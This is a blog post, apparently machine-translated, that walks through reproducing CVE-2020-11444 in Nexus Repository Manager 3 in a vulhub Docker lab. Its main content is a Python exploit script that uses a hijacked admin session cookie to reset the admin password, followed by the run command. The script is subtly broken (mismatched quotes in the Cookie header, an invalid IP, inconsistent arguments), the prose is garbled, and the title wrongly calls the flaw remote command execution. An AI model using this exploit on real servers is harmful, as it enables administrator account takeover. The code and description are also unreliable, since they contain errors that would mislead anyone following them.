Nexus Repository Manager 3 remote command execution vulnerability (CVE-2020-11444)

statement

study hard and make progress every day

Vulnerability description

The scope and harm of the affected version of the vulnerability occurred one month before and after CVE-2020-10199 and CVE-2020-10204. After a patch after 10199 and 10204 was repaired, 11444 vulnerability was exposed again.

Nexus 3 arbitrarily modifies the admin password ultra vires vulnerability. You can log in with a user with low authority to obtain the sessionID and modify the password of the admin user ultra vires

Scope of influence

Nexus Repository Manager 3.x OSS / Pro <= 3.21.1

Reproduction process

Version 3.21.1 is used here

Using vulhub

cd /app/vulhub-master/nexus/CVE-2020-10199

Start with docker

docker-compose up -d

Wait for a period of time before the environment can start successfully. You can see the Web page by visiting the following link.

http://your-ip:8081

This vulnerability requires access to update roles or create role interfaces, so we need to use the account password admin:admin to log in to the background (Sign In in in the upper right corner).

After logging in, you still need to do some configuration, change the password, etc

After completion, refresh any page in the login status, grab the package and obtain the Cookie of the current user

Here, we use the sessionID of admin to exceed authority

In other words, the password of the admin user can be modified by using the low authority user and replacing the sessionID in the cookie with the sessionID of admin

I use user (general user) to modify admin user (administrator) without authority

Note here that you should first obtain the session ID of admin and replace the session ID of admin with the following ID (the session seems to expire in 10 minutes, and catch it again when it expires)

NX-ANTI-CSRF-TOKEN (user's) is the remaining IP, which can be replaced by itself

#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub

import sys
import requests

if len(sys.argv)!=3:
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                                          +')
    print('+      CVE-2020-11444 Nexus 3 Unauthorized Vuln (change admin password                          +')
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ USE: python3 <filename> <url> <session> <password>                                            +')
    print('+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 123456 +')
    print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1                                         +')
    print('+-----------------------------------------------------------------------------------------------+')
    sys.exit(0)

url = sys.argv[1]
vuln_url = url + "/service/rest/beta/security/users/admin/change-password"
password = sys.argv[2]

headers = {
    'accept': "application/json",
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
    'NX-ANTI-CSRF-TOKEN': "0.4256948739162416",
    'Content-Type': "text/plain",
    'Origin': "http://1292.168.239.129:8081",
    'Cookie': "NX-ANTI-CSRF-TOKEN=0.4256948739162416; NXSESSIONID="f24dc2f7-7db6-4c04-8b46-52dba909579a"
}
data = """%s""" % password

r = requests.request('PUT', url=vuln_url, headers=headers, data=data)
if r.status_code == 204:
    print ("[+] Passowrd Change Success")
    print ("[+] " + url)
    print ("[+] Username:admin Passowrd:"+password+"")
else:
    print ("[-] SessionID Not available")
    print ("[-] Target Not CVE-2020-11444 Vuln Good Luck")
    sys.exit(0)

implement

python3 cve-2020-10144_exp.py http://192.168.239.129:8081 123456

Sure enough, the default password admin admin can't log on

Turn off the mirror after use

docker-compose down

Docker compose common commands

Pull image (after entering a specific directory of vulhub)

docker-compose build
docker-compose up -d

Image query (the first column found is the ID value)

docker ps -a

Enter the specified image (enter according to the ID found in the previous item)

docker exec -it ID /bin/bash

Turn off mirroring (turn off after each run out)

docker-compose down

Tags: Web Security Information Security security hole

Posted by rachel2004 on Tue, 03 May 2022 09:54:50 +0300